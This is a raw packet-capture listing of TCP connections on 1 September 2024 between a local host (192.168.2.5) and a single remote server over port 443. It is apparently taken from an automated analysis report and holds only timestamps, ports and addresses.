Sep 1, 2024 22:05:25.337274075 CEST	443	49977	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.425199986 CEST	443	49978	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.425465107 CEST	49978	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.425476074 CEST	443	49978	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.467693090 CEST	443	49980	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.467797995 CEST	443	49977	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.467849970 CEST	443	49977	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.467922926 CEST	49977	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.468302011 CEST	49977	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.469119072 CEST	49981	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.469152927 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.469255924 CEST	49981	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.469420910 CEST	49981	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.469432116 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.481478930 CEST	49980	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.481497049 CEST	443	49980	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.486884117 CEST	443	49979	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.488748074 CEST	49979	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.488770008 CEST	443	49979	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.555871010 CEST	443	49978	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.555944920 CEST	443	49978	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.556010962 CEST	49978	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.556274891 CEST	49978	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.557390928 CEST	49982	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.557423115 CEST	443	49982	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.557485104 CEST	49982	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.557755947 CEST	49982	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.557765961 CEST	443	49982	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.558126926 CEST	49980	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.558173895 CEST	443	49980	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.558224916 CEST	49980	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.558417082 CEST	49983	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.558443069 CEST	443	49983	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.558501959 CEST	49983	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.558645964 CEST	49983	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.558655024 CEST	443	49983	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.559490919 CEST	49982	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.559680939 CEST	49984	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.559711933 CEST	443	49984	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.559763908 CEST	49984	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.559781075 CEST	49985	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.559808969 CEST	443	49985	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.559850931 CEST	49983	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.559873104 CEST	49985	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.559948921 CEST	49984	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.559981108 CEST	443	49984	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.560079098 CEST	49986	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.560085058 CEST	443	49986	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.560102940 CEST	49984	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.560113907 CEST	49985	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.560129881 CEST	49986	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.560156107 CEST	443	49985	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.560194016 CEST	49985	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.560285091 CEST	49986	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.560295105 CEST	443	49986	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.560436010 CEST	49987	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.560442924 CEST	443	49987	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.560822964 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.560830116 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.560849905 CEST	49987	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.561089039 CEST	49986	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.561120033 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.561252117 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.561263084 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.604500055 CEST	443	49983	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.604502916 CEST	443	49982	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.604510069 CEST	443	49986	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.622653961 CEST	443	49979	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.622807026 CEST	49979	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.622817039 CEST	443	49979	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.785563946 CEST	443	49979	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.785612106 CEST	443	49979	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.785682917 CEST	49979	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.786288023 CEST	49979	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.787169933 CEST	49989	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.787183046 CEST	443	49989	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.787281036 CEST	49989	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.787650108 CEST	49989	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.787661076 CEST	443	49989	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.889316082 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.889328003 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.889475107 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.889796972 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.889807940 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.990741014 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:25.996073008 CEST	49981	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:25.996095896 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.018584013 CEST	443	49982	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.018671989 CEST	49982	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.018692017 CEST	49982	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.019731045 CEST	443	49983	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.019797087 CEST	49983	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.019983053 CEST	49983	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.027568102 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.027640104 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.028764963 CEST	443	49986	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.028821945 CEST	49986	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.028835058 CEST	49986	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.139617920 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.139796972 CEST	49981	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.139812946 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.163928032 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.163949966 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.164311886 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.167205095 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.212490082 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.263276100 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.263442993 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.263451099 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.291467905 CEST	443	49989	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.295983076 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.296052933 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.296387911 CEST	49981	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.296403885 CEST	443	49981	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.296413898 CEST	49981	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.296453953 CEST	49981	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.297270060 CEST	49991	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.297306061 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.297369957 CEST	49991	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.297544956 CEST	49991	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.297557116 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.299343109 CEST	49989	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.299364090 CEST	443	49989	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.357733011 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.357840061 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.359085083 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.359088898 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.359355927 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.360523939 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.383857965 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.383924007 CEST	443	49988	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.383995056 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.404501915 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.417840004 CEST	49988	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.433346987 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.433356047 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.433430910 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.433684111 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.433695078 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.433732033 CEST	443	49989	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.434123039 CEST	49989	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.434128046 CEST	443	49989	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.490242958 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.490586996 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.490595102 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.579469919 CEST	443	49989	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.579525948 CEST	443	49989	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.579651117 CEST	49989	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.583173037 CEST	49989	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.601346970 CEST	49993	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.601366043 CEST	443	49993	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.601497889 CEST	49993	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.603185892 CEST	49993	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.603195906 CEST	443	49993	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.633963108 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.634038925 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.634457111 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.634464979 CEST	443	49990	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.634493113 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.634573936 CEST	49990	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.635121107 CEST	49994	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.635128021 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.635263920 CEST	49994	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.639183044 CEST	49994	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.639194012 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.773509026 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.779903889 CEST	49991	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.779920101 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.891678095 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.893146992 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.893163919 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.902837992 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:26.903112888 CEST	49991	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:26.903120041 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.033279896 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.034327030 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.034349918 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.034493923 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.034513950 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.035361052 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.035384893 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.035589933 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.035599947 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.047851086 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.047920942 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.048254967 CEST	49991	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.048264980 CEST	443	49991	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.048300028 CEST	49991	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.048336983 CEST	49991	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.051187038 CEST	49995	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.051201105 CEST	443	49995	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.051523924 CEST	49995	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.051747084 CEST	49995	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.051757097 CEST	443	49995	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.077954054 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.082227945 CEST	49994	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.082245111 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.085108042 CEST	443	49993	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.091185093 CEST	49993	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.091196060 CEST	443	49993	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.189989090 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.191431046 CEST	49994	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.191440105 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.216756105 CEST	443	49993	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.217103958 CEST	49993	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.217108965 CEST	443	49993	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.321175098 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.321249962 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.321652889 CEST	49994	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.321665049 CEST	443	49994	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.321692944 CEST	49994	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.322362900 CEST	49994	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.323187113 CEST	49996	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.323199034 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.323801994 CEST	49996	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.324584007 CEST	49996	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.324594975 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.344528913 CEST	443	49993	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.344572067 CEST	443	49993	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.345611095 CEST	49993	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.347186089 CEST	49993	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.363163948 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.363250017 CEST	443	49992	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.363372087 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.363890886 CEST	49992	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.363890886 CEST	49997	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.363903999 CEST	443	49997	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.367342949 CEST	49997	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.370850086 CEST	49997	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.370861053 CEST	443	49997	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.569724083 CEST	443	49995	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.596484900 CEST	49995	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.596497059 CEST	443	49995	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.657329082 CEST	49998	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.657339096 CEST	443	49998	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.657417059 CEST	49998	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.657773972 CEST	49998	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.657780886 CEST	443	49998	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.703104019 CEST	443	49995	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.705025911 CEST	49995	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.705033064 CEST	443	49995	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.799030066 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.809201002 CEST	443	49995	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.809598923 CEST	443	49995	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.809659004 CEST	49995	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.831705093 CEST	49995	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.885829926 CEST	443	49997	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.941118956 CEST	49999	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.941134930 CEST	443	49999	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.941203117 CEST	49999	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.941598892 CEST	49999	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:27.941610098 CEST	443	49999	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:27.976803064 CEST	49997	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.004508972 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.004555941 CEST	49996	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.230902910 CEST	443	49998	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.234035015 CEST	49998	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.234049082 CEST	443	49998	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.263709068 CEST	49997	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.263720989 CEST	443	49997	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.265338898 CEST	49996	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.265352964 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.358093977 CEST	443	49998	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.358355999 CEST	49998	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.358362913 CEST	443	49998	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.365346909 CEST	443	49997	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.365592003 CEST	49997	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.365598917 CEST	443	49997	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.367690086 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.368015051 CEST	49996	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.368022919 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.418741941 CEST	443	49999	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.432658911 CEST	49999	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.432672024 CEST	443	49999	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.495321989 CEST	443	49998	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.495373964 CEST	443	49998	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.495440006 CEST	49998	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.496390104 CEST	49998	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.500233889 CEST	50000	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.500252962 CEST	443	50000	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.500318050 CEST	50000	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.500781059 CEST	443	49997	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.500811100 CEST	50000	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.500823021 CEST	443	50000	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.500840902 CEST	443	49997	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.500884056 CEST	49997	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.501915932 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.501983881 CEST	443	49996	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.502070904 CEST	49996	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.502346992 CEST	49996	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.502718925 CEST	50001	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.502743006 CEST	443	50001	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.502793074 CEST	50001	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.503181934 CEST	50001	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.503197908 CEST	443	50001	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.503593922 CEST	50002	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.503601074 CEST	443	50002	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.503673077 CEST	50002	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.503988028 CEST	50002	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.503999949 CEST	443	50002	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.515208006 CEST	49997	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.561039925 CEST	443	49999	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.573132992 CEST	49999	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.573143959 CEST	443	49999	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.720395088 CEST	443	49999	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.720460892 CEST	443	49999	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.720511913 CEST	49999	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.720947027 CEST	49999	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.721797943 CEST	50003	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.721820116 CEST	443	50003	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.722029924 CEST	50003	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.722333908 CEST	50003	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.722347975 CEST	443	50003	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.957413912 CEST	443	50000	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.959470987 CEST	50000	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.959485054 CEST	443	50000	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.982074022 CEST	443	50002	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:28.983789921 CEST	50002	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:28.983809948 CEST	443	50002	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.014323950 CEST	443	50001	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.015853882 CEST	50001	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:29.015866041 CEST	443	50001	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.089478970 CEST	443	50000	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.091459036 CEST	50000	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:29.091473103 CEST	443	50000	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.119113922 CEST	443	50002	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.119404078 CEST	50002	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:29.119412899 CEST	443	50002	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.163220882 CEST	443	50001	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.165888071 CEST	50001	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:29.165894032 CEST	443	50001	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.228807926 CEST	443	50003	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:29.230592966 CEST	50003	443	192.168.2.5	198.185.159.177
